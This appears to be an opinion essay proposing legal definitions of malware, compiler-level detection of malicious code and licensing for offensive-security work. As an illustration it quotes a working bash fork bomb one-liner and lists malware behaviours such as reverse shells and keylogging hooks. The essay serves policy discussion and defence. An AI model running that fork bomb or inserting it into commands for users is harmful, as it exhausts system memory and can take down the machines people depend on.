The Benefits and Challenges of Creating Legal Definitions for Malware

Defense strategies in most organizations generally anticipate that an attacker will make some changes to the files on a system, create a log of activity that can be detected by a SIEM (Security Information and Event Management software), trigger some other type of file, or log-based vector.

However, fileless malware has been on the rise as an attack vector since 2016. Instead of invading the file systems of target machines with malicious programs that leave behind signatures, better known as “indications of compromise,” attackers have new methods that work exclusively in RAM, forcing security teams to look instead for IOA, “Indications Of Attack.”

Looking for IOA turns out to be a big data problem since most organizations have an excessive amount of activity, much more than can be humanly analyzed. In this article, I will be looking into another lens, one closer to the attacker’s home base, and that allows law enforcement to make what amounts to a “surgical strike” on coders whose intent falls outside the scope of programmatic usefulness.

Indications of Maliciousness (IOM) is a new way of looking at compilers and Integrated Development Environments IDEs (the software that engineers use to create software) to detect when malicious code is being created and warns the programmer that their code can harm a user’s system or violate the law.

For this approach to be successful as a method of reducing cybercrime, three elements must be developed in close alignment: Code-based legal definitions, Compiler, and IDE level IOM detection and technically sound enforcement. Defining what malicious code looks like will help security tools detect malicious software while it is being written.

Those same definitions might be of help in creating laws and penalties that serve as a deterrence against malicious behavior before it shows up as malware in any system. If these definitions are appropriately implemented, writing malicious code will be illegal and impractical.

Now we’ve gotten a headstart. I will outline the threat posed by fileless malware, review how we are currently responding to the threat, tactically and legally. Then, outline a new method of confronting the problem by monitoring IOMs at the code level with legally enforceable definitions as a collaborative effort with the software engineering community.

As Jessica DeCianno argues in her article for Crowdstrike, we need to start looking for different elements of IOA vs. IOC: This shift in perspective from traditional IOC to IOA is not an easy one for the enterprise and the legal community.

Corporations and governments tend to be slow to respond to these types of changes, mainly because of the tremendous investment involved in developing any solution. Fileless malware has been embraced and celebrated by the hacker community, as evidenced by the number of talks about in-memory exploits at DefCon in 2019.

Every main stage talk at DefCon involved some sort of in-memory attack. Meanwhile, at BlackHat, a more corporate infosec conference, in-memory attacks were sidelined to smaller off the radar sessions.

The contrast between the conferences is a clear indication that corporate America is not taking in-memory exploits as seriously as they should. Only a handful of security companies like Cylance, CrowdStrike, and ExtraHop can boast of full-throated approaches to the analysis of IOA. One reason for this gap is that analysis of IOA is extremely hard, mainly because the analysis of memory is extremely complex and difficult.

As the mainstream slowly shifts to analyzing IOA, more advanced hackers (mostly nation-states) are already moving to new methods that make finding IOA almost impossible by “Living off the land” (LOTL). Jen Miller Osborn, deputy director of Threat Intelligence for Unit 42, explains what fileless malware attacks are and why “living off the land” is so attractive for malicious actors.

So, these are two ways that attackers now are moving into spaces that are, A, hard to detect, and B, require a lot more behavioral analytics. Because there are a lot of things that you’ll typically see legitimate system admins use, but you’re seeing attackers use. Because instead of using malware or using something such as Mimikatz, which is a known tool, which a lot of people will flag, now they’re using tools where they’re going to be whitelisted.

And they’re probably — if they’re not already present on a network for legitimate purposes, you’ll see, a lot of times, attackers will bring them down because they’re aware that these are legal tools and that they’re probably whitelisted. You aren’t going to detect them maliciously unless you’re running additional behavioral analytics that will show you that these whitelist tools are being used in a way that the sysadmin would not be using them.”

So here we are, most businesses have just started monitoring for IOC while the latest infosec tools are monitoring for IOA. Ironically, IOA is quickly becoming irrelevant because attackers are learning ways to hide all of their activities in whitelisted traffic/activity.

In summary, technology is two steps behind, and to make matters worse, the laws to deal with all this are nearly 34 years old. Before we discuss any effort to monitor IOM, let’s review how the law deals with malware and the people that are caught making it.

The Computer Fraud and Abuse Act (CFAA) has been roundly criticized as being too broad, but that isn’t the only problem with the 34-year-old law. Many have taken issue with the abstract and frankly, strange definitions included in the law. I am not the first to propose a code-based approach to reforming the CFAA.

The code-based approach proposed by Bellia is a call for better definitions based on our current understanding of software instead of the abstract and broad definitions created in 1986. Meanwhile, Kerr points out that much of the CFAA’s confusion lies in the fact that it can’t decide on whether infractions are fraud or trespass.

Maybe they are both? Nonetheless, this criticism and debate put a spotlight on the ongoing weaknesses of the law in our current environment. “Hacking” is usually perpetrated by actors that are trespassing and defrauding their victims all at the same time.

But maybe the weakness is not because the laws’ definitions are too broad, or the sentencing is out of step, but because the law is focused on the results of cybercrime as opposed to the creation and the possession of the tools used to execute the crime.

The Bureau of Alcohol, Tobacco, Firearms, and Explosives regulates the creation, sale, and possession of most deadly weapons. Who is responsible for the regulation of cyberweapons?

The obscure “Bureau of Political-Military Affairs’ Directorate of Defense Trade Controls (DDTC) is the organization within the US Department of State responsible for enforcing the International Traffic in Arms Regulations (ITAR),” but there is no evidence that they have any history of successfully stopping cybercrime.

The International Traffic in Arms Regulations (ITAR) is a set of rules maintained by the State Department to restrict and control the export of defense and military-related technologies to safeguard US national security and further US foreign policy objectives. However, ITAR hasn’t had much success in the digital space.

Notably, the State Department quite notably lost in its early attempt to make encryption illegal. And most recently, they failed even to stop the proliferation of plans for a 3D printable firearm. In the case of the firearm, the creator of the 3D plans, Cody Wilson argued that the plans were protected by the First Amendment.

The case was settled with the State Department withdrawing its restriction, which seemed to be a loss for the law enforcement community. Wilson, on the other hand, fought the government in order to prove a point: “You can print a lethal device. It’s kind of scary, but that’s what we’re aiming to show.”

A gun is a clearly lethal device because even though the plans live in the digital space, they can be used to create something in the physical space that may be illegal depending on local laws.

Malicious code also may be harmless when sitting by itself on the private machine of an attacker. It may become destructive and possibly lethal (imagine code that forces a nuclear reactor to meltdown) if it is distributed and unleashed on a target.

However, there is a big difference between what Mr. Wilson published and code that is crafted with the capability to destroy. The code doesn’t need to “become” a physical object before it possesses lethal attributes. As a matter of fact, the code may not even need to be physically on the machine or in the network of a target to be destructive.

Code can be malicious, written, and crafted to cause harm to a specific target. Think of it like a poison that only affects one person based on some sort of DNA matching biohacking. If the poison has no other purpose (no medical, or research value), should it be legal to create a poison like this?

The world community has generally said yes, hence the illegality of substances like sarin gas that have no redeeming qualities and are only designed to create immense human suffering and death.

If ITAR can’t identify and/or classify “digital poisons” that have no other purpose than to destroy, infiltrate, and compromise the integrity of computer systems and networks, then it has a serious problem. A digital weapon is a weapon, nonetheless. If ITAR had a way to technically classify and define malicious intent as it relates to digital weapons, it would be a start.

While the exact cost of cybercrime is largely unknown, one study found, “As a striking example, the botnet behind a third of the spam sent in 2010 earned its owners around $2.7 million, while worldwide expenditures on spam prevention probably exceeded a billion dollars.”

Juxtaposing the money being made and spent on cybercrime against the number of indictments alone, it is very clear that the US legal apparatus has been outnumbered, outgunned and outsmarted by cybercriminals with no clear path towards mitigation.

Furthermore, failure to move faster could threaten the integrity of the entire ecosystem. Two years ago, Dan Goodin outlined “a rash of invisible, fileless malware is infecting banks around the globe”. “Virtually all of the malware resides solely in the memory of the compromised computers, a feat that had allowed the infection to remain undetected for six months or more.”

This article, written two years ago, was written about a finding from Kaspersky Lab in 2015. Four years is a lifetime in hacker years, so one can only imagine what advancements have been made on the attacker side till now.

Nonetheless, the response from law enforcement is stunningly silent. I conducted my own research and analyzed a total of 4,049 published state and federal cases that referenced CFAA (18 USCS § 1030). Only 5% (215) of them led to indictments and criminal proceedings. Think about that for a moment.

Criminal activity is sucking billions of dollars out of the US economy every year, yet the source of said criminal activity and the law designed to prosecute it has only caught and indicted 215 people since its inception. Either the law is not being used by prosecutors, or law enforcement can’t find evidence that aligns with it or both. The right answer is “all of the above.”

I have already addressed the legal issues above in the CFAA and the ITAR sections, which mainly have to do with inadequate definitions. But, these inadequate definitions pour over to create a serious problem for law enforcement.

In the non-digital world, if I wrote a manifesto and built a bomb, I could be arrested before I deployed the said bomb. As a matter of fact, I could even be arrested while I was gathering the bomb materials. (18 USC Sec. 842).

What does it mean that writing a manifesto and building a fork bomb (also called “rabbit virus” or “wabbit”) like the one shown below doesn’t have any consequences?

:(){ :|:& };:

Injecting the above code into a terminal of a Linux based system could damage or destroy it (depending on the way the code is deployed). The code above basically creates an infinitely recursive function that will basically destroy the memory (RAM) of a machine.

We have visual evidence of the harm a physical bomb can cause, but most people don’t know what the one line of code above means. Furthermore, the effects are not as sensual (affecting the senses) as a physical bomb. It kills the machine slowly and silently. The fork bomb does rip through flesh and topple buildings but is still dangerous nonetheless.

Who cares if a bomb is detonated in the desert? Nobody. Who cares if a fork bomb is detonated on my home computer that has nothing on it, nobody (except for me maybe because I just destroyed a computer). But, if both of those bombs were detonated in a hospital, let’s say a trauma center where people are counting on the computing infrastructure, it could lead to the loss of lives.

So, in summary, the laws are inadequate, and therefore law enforcement doesn’t have the tools to do their jobs, and I fear that many law enforcement units have given up. How could it get worse? It is getting worse because the threats are increasing, and the financial damage caused by the threats are intensifying.

The same study about the costs of cybercrime found that most of the threats have been increasing and intensifying. Attackers are not slowing down at all, even though prosecutions under the CFAA and scrutiny under ITAR regulations have increased.

The measurements based on financial damage seem to be the best indicator because the purveyors of malicious code are generally not interested in killing people or inflicting physical harm.

Most of the attacks have one target, which is money. Data that is stolen is sold on the Dark Web, credentials that are stolen are sold on the Dark Web, Personal Identifying Information that is sold on the Dark Web.

Furthermore, all of this stolen data and information is used to perpetrate fraud which also has the end goal of stealing money. Jonathan Lusthaus conducted a seven-year study on cybercriminals.

After interviewing over 238 of them, he concluded that “they are not who we think they are.” According to Lusthaus many of them consider themselves “businessmen” instead of stereotypical mischievous nerds.

Furthermore, their interest in cybercrime is usually temporary, meaning they usually have normal legitimate jobs, then venture into cybercrime to make more money. “More advanced carders and hackers, however, usually show strong disgust to ‘traditional’ criminals and usually join whatever cause there might be on a temporary basis. In turn, ‘traditional’ criminals often regard cybercriminals as ‘milk cows’ and nerds.”

This is an important point because if law enforcement can increase the amount of risk associated with even writing malicious code, it is possible to reduce the number of these “temporary criminals” who will take the risk.

It might seem that creating definitions of cybercrime that include writing malicious code may be broadening the law, but there is a clear distinction. The difference is because, in the non-digital world, two actions can mean the same thing, whereas, in the digital world, two functions can rarely occupy the same space.

For instance, in the non-digital world if we made the act of “casing a house” a crime that would mean people who are simply driving by a house over and over because the act looks incriminating. Casing a home acquires its meaning above and beyond actions of just driving by in the context of other elements that support evidence that a person is planning a crime.

In the digital world, there is a much less gray area because of the inherent complexity of software. One does not accidentally make a keylogger or create a program that exfiltrates data without user permission. Yes, users can make mistakes and put data in the wrong place, which makes it accessible to unintended parties.

But a software engineer does not accidentally create a system that bypasses user permission unless the operating system has a serious flaw. In the non-digital world, the context and dependencies that support criminal activity are evaluated by a court. In the digital world, this evaluation is performed by the Compiler.

Compilers are sophisticated programs that turn human-readable code into “machine code” that can be understood by a CPU. It is the job of the Compiler to read every line of code before compressing a program into a run-time. Consequently, every Compiler has a list of rules, dependencies, and strict requirements that it looks for before it will make a program into a run-time.

To that end, compilers are already gatekeepers for errors that might exist in the program. A program with errors as defined by the rules of the programming language won’t compile. This is what makes building compilers and tampering with them extremely difficult. They are immensely complex programs and may even have requirements that look for a valid license before they compile code.

Making compilers into security gatekeepers will not be easy. However, compilers are the best component in the software development stack for the job. Each instance of a compiler may also have a signature that verifies the version of the Compiler, the subscription granted to the programmer, and the authorization that this subscription has to publish software.

The problem is not that compilers are not able to analyze for security violations; it is that they have not been asked to. Of course, if compilers started validating security protocols, attackers would start hacking compilers, but it wouldn’t be easy.

We know that people create forged currency, but that doesn’t stop us from creating money with more sophisticated ways of catching fakes. The amount of engineering proficiency that it would take to create a fake compiler would be incredible, only to be discovered and have to re-invent the forgery again.

As an extra mitigating step, companies could require that code for any program be delivered uncompiled and only compiled with internally verified compilers. The US Military already does this. I have written code for the US Navy, the US Army, and DISA. They would never use code that I delivered to them pre-compiled. It was always analyzed and compiled by internal resources.

Companies or organizations that control critical infrastructure should do the same. Anything running on a corporate network that has access to sensitive data should be compiled in-house with compilers that are verified for security validation.

Detecting and stopping cybercrime can’t just start when the attacker actually finds a way to breach an organization’s defenses. This is not the case with physical crimes, especially terrorism. We have known since 9/11 that we have a duty to gather intelligence that prevents crime and acts of war.

I would argue that this duty doesn’t change when the crime is perpetrated in the digital space. Furthermore, the main reason we don’t monitor and stop the creation of digital weapons is that we don’t have the tools to properly monitor the creation of such weapons.

Additionally, there is a fear that monitoring the creation of digital weapons would involve spying on or restricting the free speech of engineers. While these fears could be legitimate, I feel it underscores the need for a serious discussion on what a collaborative effort between the infosec and legal communities look like.

We can start by shifting our perspective. Malware doesn’t have an inherent goal of storing files on the hard drive of a machine. The inherent goal of attackers is to steal information and access. Shifting the perspective of defense to match the offensive attacks only makes sense.

The programming community needs to start taking responsibility for adding security to compilers and interpreters. Operating system publishers need to work with the hacking community to understand how attackers pivot into memory systems and how they can work with programming languages and hardware manufacturers to surface meaningful alerts to users when activity in-memory matches the elements of IOA.

Third-party software like Cylance and CrowdStrike can only do so much. The deep collaboration will create an opportunity for the programming language and the operating system to validate the intent of the users, maybe with hardware as a more immutable test for the authenticity of the communication between the two.

We should consider creating legal definitions of malware that can be enforced at the programming language level for a number of reasons. In the preceding discourse, I have discussed the problems that exist with the current laws and enforcement methods. I also discussed why compilers are well suited for the job of being the low-level enforcers.

But why do we need legal definitions? Can we have gatekeeper compilers without law enforcement? Yes, and creating a gatekeeper is not enough. Legal definitions, when created and implemented carefully influence behaviors beyond the scope of one group.

The law is our agreement as a nation about what behavior we find to be accepted or objectionable. Practically this means that businesses, organizations, and individuals tend to align their expectations with the law. Without the law, there is no shared expectation of security. Consequently, legal definitions can:

  • Enhance existing detection protocols in anti-virus protection software
  • Create warnings in code writing IDEs and in the binary of compilers so code with dangerous intent will not compile.
  • Extend the reach of law enforcement to pursue action against people and organizations that host dangerous code
  • Educate software engineers about dangerous code patterns

The use of this type of software is still relatively new in the world of business programmers, and businesses have enjoyed the lack of regulation. As a result, discussions about regulation have been overpowered by voices protesting that regulation will infringe on First Amendment rights and stifle innovation.

Additional skeptics have asserted the well-founded opinion that the regulation of software would have a negative impact on innovation. It is true; new regulation often has a chilling effect on innovation as it presents an additional roadblock for those developing new and exciting ideas. However, I will challenge these assertions with two important points:

  • Failure to implement controls on software threatens to continue to foster a “wild west” environment where stronger and more unpredictable digital weapons are readily available. These weapons could literally destroy everything we have built in the digital space.
  • Well defined, programmatic enforcement will not only deter, but would be non-professional for criminals, but it may allow law enforcement to stop digital weapons before they are deployed.

However, there are several challenges with creating malware definitions:

  • It could deter the creation and utilization of legal and legitimate pen-testing software.
  • The definitions could be hard to maintain and may quickly be outdated if defined improperly, hastily, too broadly or too narrowly.

While acknowledging these challenges, we should also recognize that most modern coding languages and compilers were built to rapidly and efficiently handle change in management, complex dependencies, and deep self-analysis.

This type of complex definition/decision making is what software does best. Asking engineers to create code that performs pre-forensics on code is no less complex than memory management or cache-invalidation. It’s complex and difficult, but it’s not impossible.

After reviewing how broad and intense the threat of malware has become, it might seem paradoxical to learn how simplistic the goals of attackers can be. In fact, the target of malware is so straight forward we know almost everything about what malware is trying to do and how it does it. First off, malware seeks to evade detection from everyone and everything.

Second, it needs the highest level of permission, root level if possible. Third, malware is trying to steal or expose information that would otherwise be private. The only reason there are so many variations of malware is that they all enter, hide, and steal in different ways.

Much in the same way a thief who enters a home by picking the backdoor needs a different set of tools than the thief who poses as a repairman. In the security research community, there is an agreed-upon common classification for malware into one of the nine types:

  • Backdoors: Malicious Software that opens up a communication channel that cannot be detected by the user or admin.
  • Botnets: A small program built to programmatically attack an organization’s network.
  • Downloaders: Malicious Software that masquerades as legitimate software but downloads malicious code in the background.
  • Information Stealing Malware: Malicious Software that exfiltrates sensitive information from the user or admins system without their knowledge or permission.
  • Launchers: Malicious Software that masquerades as legitimate software but runs malicious software in the background without the knowledge or permission of the user or admin.
  • Rootkits: Malicious Software that alters the user or admin’s operating system so that it is insecure or more vulnerable to attack.
  • Scareware: Malicious Software that tries to scare the user or admin into paying a ransom.
  • Spam-sending malware: Malicious Software accesses the user or admins contact list without their knowledge or permission for the purpose of sending out SPAM emails.
  • Worm or Virus: Malicious Software illicitly sets up persistence on the user or admin’s machine with the intent of replicating itself on any machine the user or admin is in contact with through a local network or other means.

The classifications have some loose relation to the common behaviors, which include:

Downloaders and Launchers

  • Backdoors
  • Reverse Shell
  • Remote Access Trojans

Credential Stealers

  • Graphical Identification and Authentication Interception
  • Hash Dumping
  • Keystroke Logging

Persistence

  • Tampering with the Windows Registry
  • Trojanized System Binaries
  • DLL Load Order Hijacking

Privilege Escalation

  • Rootkits (Hiding activity)
  • IAT Hooking
  • Inline Hooking

Researchers and infosec professionals are able to uncover these behaviors because they are evident in the code. For example, keyloggers have a regular pattern and “hooks” internal software that controls the keyboard and attempts to hide the execution of the code from the user or admin by making the windows shell that runs the code invisible.

Of course, such codes if implemented directly, would easily get caught. To avoid detection, attackers hide the activity by performing a hook injection which looks something like this in assembly:

Hooking processes from other programs running in memory is a common way to hide, but what if the C++ compiler required that a method verify user permission before it would allow an application to hook the keyboard? Such a notification would obviously give away the stealth desired by an attacker.

What makes this approach even better is the fact that compilers already do this work in other ways. Compilers and interpreters are designed to look for dependencies and warn the programmer or stop compilation altogether if the dependencies are not met. If we are going to allow programmers to write malicious code, we should also require user notification.

Over the years, programmers have argued that regulation of code is a regulation of free speech. We can accept this argument, but we don’t need to accept that this speech is also invisible to the people using the program. A compiler in any language knows when methods are being used in violation of that language’s standards.

Here are some examples of code that should be illegal to write and deploy. Code that:

  • Modifies the core functions of the Operating System without ongoing user or admin permission.
  • Modifying the Windows Registry without user or admin permission
  • Implementing a hook associated with keylogging without user or admin permission.
  • Implementing a hook associated with command and control without user or admin permission.
  • Implementing a hook in a way that makes hides which program is running without user or admin permission.

The common thread here is a major action being taken “without user or admin permission”. What can be considered a major action? Here is a starter list:

  • Any action that exposes the user’s or admin’s personally-identifying information.
  • Any action that monitors, records, or tracks the user’s or admin’s activity globally.

There are many reasons why some programmers should be allowed to create malicious code. Penetration Testers, sometimes referred to as the Red Team, uses malicious code to test the strength of an organization’s defenses.

Intelligence Agencies use many of the same tools to penetrate criminal organizations or gather international signal intelligence. In both of these cases, the programmer is acting in the capacity as a security professional and doing their job.

Their goal is not to operate outside the bounds of the law, but to simulate an attack from a malicious actor with the permission of an organization or to use malicious code in the context of law enforcement the same way a police officer would use a gun. One could also argue that the same could be said of those seeking security education, although the restriction of use and exposure should be controlled.

Explaining what a fork bomb is to a room of students and giving the details on how to deploy one covertly by hijacking administrator privileges in Microsoft Active Directory are two very different things. The first is educational information, and the second is instructions.

Law Enforcement, Penetration Testing, Military Operations, Limited Educational Applications; all of these reasons are valid exceptions for handling dangerous code, but only in the same way we make exceptions for people handling other dangerous weapons. I can’t just walk into the grocery store and buy an Uzi.

As a matter of fact, I can’t walk into a store and buy any type of firearm in the state of California without a license and a background check. Digital weapons should be handled with the same amount of care. The reason they haven’t been handled with the same amount of care is that digital weapons are not physical, yet they can cause great physical damage.

Engineers that handle dangerous code for professional purposes, research purposes, or educational purposes should register with a licensing body in the same way law enforcement or military personnel must register to possess deadly weapons. Law Enforcement licenses for digital weapons would be handled by the Department of Justice.

Military authorization to use digital weapons would be handled by the Pentagon. Pentesting and Educational licenses should be issued by an agency like CISA (Cybersecurity and Infrastructure Security Agency). Each piece of pen-testing or educational code should include the operator’s digital signature in the form of a public key.

This type of open discussion about the exceptions to the regulation of digital weapons is actually a discussion about how to create a structure or structures that regulate and allow the use of digital code for the correct purposes. Doubtless, digital weapons shall continue to be created; there is no question about that.

Whether the creation and the use of such code should be regulated by requiring people who make it and use it to identify themselves is the question. Creating or possessing a digital weapon is not free speech in the same way; building or buying a gun is not free speech.

Americans have are yet to embrace this as a concept, but non-physical things can be dangerous, maybe even more dangerous than physical things. Some may say this is a slippery slope. The next thing you’ll see, we will start regulating, discussing certain topics, or thinking certain ideas.

But there is a huge difference between a discussion about how to attack a computer system and the compiled code that targets that system. A discussion will never cause harm to a system until someone takes the details from that discussion and writes code to carry out an attack.

If thoughts and expressions of violence were the equivalents of actual violence, there wouldn’t be any film, books, or television. I understand the sentiment; however, digital weapons are code, and code is a language that feels very close to written expressions like this article, for example. But code is much more than the expression of an idea.

Code is a set of instructions that are designed to carry out actions in the digital space. If those instructions are designed to destroy, damage, or steal. Then, those instructions are a digital weapon.

In summary, we have established a few things. First, digital weapons are doing a lot of damage to our country and the world-at-large. Second, the laws we have to stop this activity are not being used and need to be refined, so it includes the tools used to conduct criminal activity, not just the activity itself.

Third, we have the ability to create specific technical definitions of what maliciousness is in the digital space and train compilers and IDEs to spot it. Lastly, we can create a regulatory structure that makes room for the approved use of the malicious code when it is used for testing, by the military or law enforcement and/or limited educational purposes.

I have a feeling that security professionals won’t be too happy about having to register as a cybersecurity professional with the government, but the benefits tremendously outweigh the hassle. The IDE and the compiler will warn you if your code looks malicious.

But, if you are writing malicious code for the “right reasons” as I outlined above just register with CISA upload your public key and the warnings will go away. It’s fun to pretend to be bad guys, but as a security professional, I also need to advocate for doing what is right.

Software as an industry has resisted regulation for decades, but we are far beyond the days when two guys fiddling around with phones and motherboards in their garage could be considered non-threatening. Our lives are supported by a delicate yet incredibly powerful digital infrastructure. It is high time we create the frameworks backed by the power of a robust legal system that will protect it.

Socially Aware Data Science and CyberSecurity Engineering Leadership